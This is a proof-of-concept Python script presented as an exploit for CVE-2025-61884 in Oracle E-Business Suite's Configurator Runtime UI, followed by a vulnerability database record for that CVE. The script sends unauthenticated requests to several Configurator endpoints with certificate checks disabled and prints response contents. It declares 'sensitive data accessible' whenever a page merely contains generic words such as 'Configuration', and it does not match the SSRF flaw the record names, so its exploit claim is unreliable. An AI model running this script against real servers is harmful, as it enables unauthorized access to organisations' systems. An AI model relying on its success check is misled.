CVE-2025-61884

# CVE-2025-61884 PoC - Oracle Configurator Unauthenticated Data Access # Vulnerability: Unauthenticated access to critical data via Runtime UI # Affected: Oracle E-Business Suite 12.2.3 - 12.2.14 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-ebs.example.com" CONFIGURATOR_PATH = "/OA_HTML/configurator/UiServlet" def exploit_cve_2025_61884(target_url): """ Exploit unauthenticated data access in Oracle Configurator Runtime UI The vulnerability allows reading sensitive configuration data without authentication """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close" } # Step 1: Access Configurator Runtime UI endpoint directly without authentication endpoints = [ f"{target_url}{CONFIGURATOR_PATH}", f"{target_url}/OA_HTML/jtflogin.jsp", f"{target_url}/configurator/runtime/", f"{target_url}/OA_HTML/cfg/", ] for endpoint in endpoints: try: print(f"[*] Probing: {endpoint}") response = requests.get( endpoint, headers=headers, verify=False, timeout=10, allow_redirects=False ) # Check for successful access or sensitive data leakage if response.status_code == 200: indicators = [ "Configurator", "Runtime UI", "Configuration", "Oracle E-Business" ] for indicator in indicators: if indicator.lower() in response.text.lower(): print(f"[+] Sensitive data accessible at: {endpoint}") print(f"[+] Response snippet: {response.text[:500]}") return True elif response.status_code == 403: print(f"[-] Access denied: {endpoint}") else: print(f"[*] Status {response.status_code}: {endpoint}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print(f"[*] CVE-2025-61884 Oracle Configurator Data Access PoC") print(f"[*] Target: {TARGET_URL}") exploit_cve_2025_61884(TARGET_URL)

{"cve": {"id": "CVE-2025-61884", "sourceIdentifier": "[email protected]", "published": "2025-10-12T03:15:34.720", "lastModified": "2025-10-27T17:08:49.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Configurator accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "cisaExploitAdd": "2025-10-20", "cisaActionDue": "2025-11-10", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-93"}, {"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-444"}, {"lang": "en", "value": "CWE-501"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "5CC0EA09-3974-4A14-8724-27020AECB5A8"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/alert-cve-2025-61884.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://blogs.oracle.com/security/post/apply-july-2025-cpu", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}, {"url": "https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Press/Media Coverage"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}